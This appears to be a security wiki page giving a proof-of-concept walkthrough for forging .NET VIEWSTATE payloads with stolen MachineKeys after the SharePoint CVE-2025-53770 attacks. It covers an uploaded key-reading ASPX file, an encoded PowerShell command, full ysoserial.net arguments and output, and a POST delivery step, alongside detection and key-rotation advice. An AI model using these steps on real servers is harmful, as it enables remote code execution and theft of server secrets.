ViewState - CVE-2025-53770

.NET ViewState

About 10 days after SharePoint deserialization bugs (CVE-2025-53770/53771) were abused, attackers began dropping ASPX shells that leak IIS/ASP.NET Machine Keys used to protect VIEWSTATE and cookies. If an attacker obtains a Machine Key — from web.config or the registry via uploaded ASPX — they can forge valid VIEWSTATE payloads (e.g., via ysoserial.net) to achieve Remote Code Execution across the app. Windows won’t rotate autogenerated Machine Keys automatically, so you must regenerate the Machine Key after any code execution. Defenders should also monitor Windows Application Event ID 4009 (VIEWSTATE verification failures) to detect exploitation attempts.

Requirements:

  • VIEWSTATE deserialization (LosFormatter enabled)

  • MachineKey (validation key and optional decryption key)

  • Validation algorithm (e.g., HMACSHA256 / SHA1)

  • Application path / appDomain (used when crafting VIEWSTATE)

  • Delivery capability (send malicious VIEWSTATE to the app — e.g., HTTP POST; or obtain MachineKey via LFI/XXE or by uploading an ASPX to read the registry)

POC || GTFO

Preface

As there are quite a few requirements needed I've created and uploaded the file findMachineKey.aspx to the target ASP.NET webserver. The ASPX file will read Machine Keys from registry as well as from the web.config file, and is used to simulate LFI and/or RCE to achieve the same thing.

NOTE: The findMachineKey.aspx is since release being flagged as an exploit and removed by Windows Threat Protection.

To deliver our, soon to be made, malicious VIEWSTATE payload we need a page that accepts POSTs so I made this simple web form echoing your name.

All files used can be found on GitHub.

Exploit Download ysoserial.net and create you b64 encoded payload.

PS C:\> [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('whoami > C:\Windows\Temp\a.txt'))
dwBo[truncated]HQA

Generate your malicious VIEWSTATE payload using ysoserial.net.


$ysoArgs = @(
  '-p','ViewState',
  '-g','TextFormattingRunProperties',
  '-c','"powershell -e dwBo[truncated]HQA"',
  '--path','/default.aspx',
  '--apppath','/',
  '--validationalg','HMACSHA256',
  '--validationkey','B298[truncated]173D',
  '--islegacy',
  '--isdebug'
)

PS C:\Users\void\Downloads\ysonet-v1.11> .\ysonet.exe @ysoArgs
Validation Algorithm: HMACSHA256
Validation Key: B298[truncated]173D
simulateTemplateSourceDirectory returns: /
simulateGetTypeName returns: default_aspx
SortKey.KeyData for TemplateSourceDirectory: 7, 53, 1, 1, 1, 1, 0
SortKey.KeyData for GetTypeName: 14, 26, 14, 33, 14, 35, 14, 2, 14, 159, 14, 72, 14, 153, 7, 68, 14, 2, 14, 145, 14, 126, 14, 166, 1, 1, 1, 1, 0
Calculated pageHashCode in int: -905247948
Calculated pageHashCode in uint: 3389719348
Calculated __VIEWSTATEGENERATOR: CA0B0334
%2FwEy6[truncated]WoRI%3D

Send a POST request with the malicious VIEWSTATE payload to the victim and we SHOULD get an 500 Internal Server Error response, this is good means that the exploit was successful.

Verify on the server side that the file C:\Windows\Temp\a.txt exists, meaning we got RCE.

References

LogoStealing Machine Keys for fun and profit (or riding the SharePoint wave)SANS Internet Storm Center

Last updated

Was this helpful?